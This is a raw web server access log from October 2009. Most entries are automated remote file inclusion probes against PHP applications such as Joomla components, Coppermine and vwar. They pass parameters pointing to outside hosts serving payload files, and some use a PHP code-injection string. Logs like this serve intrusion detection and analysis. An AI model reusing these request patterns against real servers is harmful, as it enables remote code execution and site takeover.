61.47.7.71 - - [28/Oct/2009:06:00:04 -0400] "GET /logs/error_log.Q109092300//db.php?path_local=http://ea3.fileave.com/chid.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
61.47.7.71 - - [28/Oct/2009:06:00:04 -0400] "GET /logs/error_log.Q109092200//db.php?path_local=http://ea3.fileave.com/chid.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
61.47.7.71 - - [28/Oct/2009:06:00:04 -0400] "GET /logs//db.php?path_local=http://ea3.fileave.com/chid.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
61.47.7.71 - - [28/Oct/2009:06:00:07 -0400] "GET //db.php?path_local=http://ea3.fileave.com/chid.txt??? HTTP/1.1" 404 205 "-" "libwww-perl/5.79"
69.175.29.26 - - [28/Oct/2009:06:00:26 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.175.29.26 - - [28/Oct/2009:06:00:26 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.175.29.26 - - [28/Oct/2009:06:00:26 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:00:31 -0400] "GET /logs/access_log.Q109080500%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:00:31 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:00:36 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.175.29.26 - - [28/Oct/2009:06:00:44 -0400] "GET /logs/error_log.Q109092300//index.php?DOCUMENT_ROOT=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.175.29.26 - - [28/Oct/2009:06:01:22 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.175.29.26 - - [28/Oct/2009:06:01:22 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.175.29.26 - - [28/Oct/2009:06:01:22 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.212.27.13 - - [28/Oct/2009:06:01:23 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://yestour.net/pass/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
66.212.27.13 - - [28/Oct/2009:06:01:23 -0400] "GET //index.php?DOCUMENT_ROOT=http://yestour.net/pass/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
66.212.27.13 - - [28/Oct/2009:06:01:23 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://yestour.net/pass/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
66.212.27.13 - - [28/Oct/2009:06:01:35 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://yestour.net/pass/id.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.212.27.13 - - [28/Oct/2009:06:01:35 -0400] "GET //index.php?DOCUMENT_ROOT=http://yestour.net/pass/id.txt? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
202.88.229.100 - - [28/Oct/2009:06:01:36 -0400] "GET /logs/access_log.Q109100700//main.php?sayfa=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:01:36 -0400] "GET /logs//main.php?sayfa=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:01:36 -0400] "GET //main.php?sayfa=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:01:46 -0400] "GET /logs/access_log.Q109072900//main.php?sayfa=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.175.29.26 - - [28/Oct/2009:06:01:54 -0400] "GET /logs/error_log.Q109092300%20%20//index.php?DOCUMENT_ROOT=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.212.27.13 - - [28/Oct/2009:06:01:56 -0400] "GET //index.php?DOCUMENT_ROOT=http://yestour.net/pass/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
202.88.229.100 - - [28/Oct/2009:06:02:39 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:06:02:41 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:06:02:41 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:02:44 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:02:44 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Oct/2009:06:02:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.155.5.84 - - [28/Oct/2009:06:02:45 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:06:02:45 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:06:02:50 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.175.29.26 - - [28/Oct/2009:06:02:52 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:06:02:54 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:03:09 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:03:09 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
69.175.29.26 - - [28/Oct/2009:06:03:12 -0400] "GET /logs/error_log.Q109092300%20%20//index.php?DOCUMENT_ROOT=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:03:14 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
63.246.152.22 - - [28/Oct/2009:06:03:59 -0400] "GET //?_zb_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
63.246.152.22 - - [28/Oct/2009:06:03:59 -0400] "GET /logs/access_log.Q109070500%20%20//?_zb_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
63.246.152.22 - - [28/Oct/2009:06:03:59 -0400] "GET /logs//?_zb_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 23667 "-" "Mozilla/5.0"
69.175.29.26 - - [28/Oct/2009:06:04:04 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.175.29.26 - - [28/Oct/2009:06:04:13 -0400] "GET /logs/error_log.Q109092300//index.php?DOCUMENT_ROOT=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.65.200 - - [28/Oct/2009:06:04:26 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0183B94E59A914004A79051+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.201 - - [28/Oct/2009:06:04:35 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L019EFB501D107500C9A904M+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.201 - - [28/Oct/2009:06:04:46 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L019EFB501CC0E500C7A904M+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.212.27.13 - - [28/Oct/2009:06:04:46 -0400] "GET /logs/error_log.Q109092300//index.php?DOCUMENT_ROOT=http://yestour.net/pass/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
66.249.65.201 - - [28/Oct/2009:06:04:56 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L019EFB501D604500CBA904M+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.47.7.71 - - [28/Oct/2009:06:06:31 -0400] "GET /logs/access_log.Q109092200%20//db.php?path_local=http://ea3.fileave.com/chid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
174.143.3.188 - - [28/Oct/2009:06:06:37 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
174.143.3.188 - - [28/Oct/2009:06:06:37 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
174.143.3.188 - - [28/Oct/2009:06:06:37 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 245 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
174.143.3.188 - - [28/Oct/2009:06:06:37 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.249.65.201 - - [28/Oct/2009:06:06:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1143704F5A8995007799093+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
63.246.152.22 - - [28/Oct/2009:06:07:16 -0400] "GET /logs/access_log.Q109082800%20%20//?_zb_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Oct/2009:06:07:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.233.8.249 - - [28/Oct/2009:06:07:52 -0400] "GET /errors.php?error=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:06:07:52 -0400] "GET /logs/errors.php?error=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:06:07:52 -0400] "GET /logs/access_log.Q109082800/errors.php?error=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:06:07:52 -0400] "GET /logs/access_log.Q109081900/errors.php?error=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.126.189.35 - - [28/Oct/2009:06:07:57 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.126.189.35 - - [28/Oct/2009:06:07:58 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:06:08:02 -0400] "GET /logs/errors.php?error=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:06:08:02 -0400] "GET /errors.php?error=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:06:08:02 -0400] "GET /logs/access_log.Q109082800/errors.php?error=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:06:08:02 -0400] "GET /logs/access_log.Q109081900/errors.php?error=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.126.189.35 - - [28/Oct/2009:06:08:17 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.126.189.35 - - [28/Oct/2009:06:08:17 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.249.65.200 - - [28/Oct/2009:06:09:00 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1143704F5AF975007D99093+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.123.212.188 - - [28/Oct/2009:06:09:09 -0400] "GET /errors.php?error=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:06:09:13 -0400] "GET /logs/errors.php?error=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:06:09:13 -0400] "GET /logs/access_log.Q109082800%20%20/errors.php?error=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [28/Oct/2009:06:09:46 -0400] "GET /errors.php?error=http://www.vowe37.org/tmpbbs//skin/happycast_category_lightblack/enda-id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [28/Oct/2009:06:09:46 -0400] "GET /logs/access_log.Q109082800/errors.php?error=http://www.vowe37.org/tmpbbs//skin/happycast_category_lightblack/enda-id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [28/Oct/2009:06:09:46 -0400] "GET /logs/errors.php?error=http://www.vowe37.org/tmpbbs//skin/happycast_category_lightblack/enda-id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:06:09:54 -0400] "GET /errors.php?error=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:06:09:54 -0400] "GET /logs/access_log.Q109082800%20%20/errors.php?error=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:06:09:54 -0400] "GET /logs/errors.php?error=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [28/Oct/2009:06:10:03 -0400] "GET /logs/access_log.Q109081900/errors.php?error=http://www.vowe37.org/tmpbbs//skin/happycast_category_lightblack/enda-id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:06:10:43 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.65.201 - - [28/Oct/2009:06:11:41 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L019EFB501D400500C0A904M+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.88.229.100 - - [28/Oct/2009:06:12:03 -0400] "GET /logs/access_log.Q109080500%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
202.102.240.88 - - [28/Oct/2009:06:12:11 -0400] "GET /logs/access_log.Q109081800/?custompluginfile[]=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
202.102.240.88 - - [28/Oct/2009:06:12:12 -0400] "GET /?custompluginfile[]=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 200 409 "-" "libwww-perl/5.65"
202.123.212.188 - - [28/Oct/2009:06:12:12 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.102.240.88 - - [28/Oct/2009:06:12:13 -0400] "GET /logs/?custompluginfile[]=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 200 23662 "-" "libwww-perl/5.65"
209.59.12.99 - - [28/Oct/2009:06:12:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.88.229.100 - - [28/Oct/2009:06:12:53 -0400] "GET /logs/access_log.Q109070700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:12:53 -0400] "GET /logs/access_log.Q109060300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
114.108.177.238 - - [28/Oct/2009:06:13:23 -0400] "GET /logs/view.php?view[use_category]=1&dir=http://econ1.nida.ac.th//review/icon.txt???? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
114.108.177.238 - - [28/Oct/2009:06:13:23 -0400] "GET /logs/error_log.Q109081400/view.php?view[use_category]=1&dir=http://econ1.nida.ac.th//review/icon.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
114.108.177.238 - - [28/Oct/2009:06:13:23 -0400] "GET /view.php?view[use_category]=1&dir=http://econ1.nida.ac.th//review/icon.txt???? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
114.108.177.238 - - [28/Oct/2009:06:13:23 -0400] "GET /logs/access_log.Q109081400/view.php?view[use_category]=1&dir=http://econ1.nida.ac.th//review/icon.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
81.12.13.152 - - [28/Oct/2009:06:13:51 -0400] "GET /logs/access_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
81.12.13.152 - - [28/Oct/2009:06:13:51 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
81.12.13.152 - - [28/Oct/2009:06:13:51 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.12.13.152 - - [28/Oct/2009:06:14:19 -0400] "GET /logs/access_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.199.218.29 - - [28/Oct/2009:06:14:40 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
217.199.218.29 - - [28/Oct/2009:06:14:40 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
217.199.218.29 - - [28/Oct/2009:06:14:40 -0400] "GET /logs/access_log.Q109100300%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
119.63.193.55 - - [28/Oct/2009:06:15:09 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
202.88.229.100 - - [28/Oct/2009:06:15:18 -0400] "GET /logs/access_log.Q109072900%20%20//main.php?sayfa=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:15:18 -0400] "GET /logs/access_log.Q109100700%20%20//main.php?sayfa=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.11.145.8 - - [28/Oct/2009:06:16:15 -0400] "GET /errors.php?error=http://www.vowe37.org/tmpbbs//skin/happycast_category_lightblack/enda-id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [28/Oct/2009:06:16:15 -0400] "GET /logs/errors.php?error=http://www.vowe37.org/tmpbbs//skin/happycast_category_lightblack/enda-id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [28/Oct/2009:06:16:15 -0400] "GET /logs/access_log.Q109082800/errors.php?error=http://www.vowe37.org/tmpbbs//skin/happycast_category_lightblack/enda-id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [28/Oct/2009:06:16:16 -0400] "GET /logs/access_log.Q109081900/errors.php?error=http://www.vowe37.org/tmpbbs//skin/happycast_category_lightblack/enda-id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:16:33 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:16:33 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:16:33 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:16:41 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:16:41 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:16:41 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
174.143.3.188 - - [28/Oct/2009:06:16:42 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
174.143.3.188 - - [28/Oct/2009:06:16:43 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
174.143.3.188 - - [28/Oct/2009:06:16:43 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
174.143.3.188 - - [28/Oct/2009:06:16:43 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
64.150.183.219 - - [28/Oct/2009:06:16:44 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:16:47 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:16:47 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:16:47 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:16:47 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:16:48 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:17:10 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:17:12 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
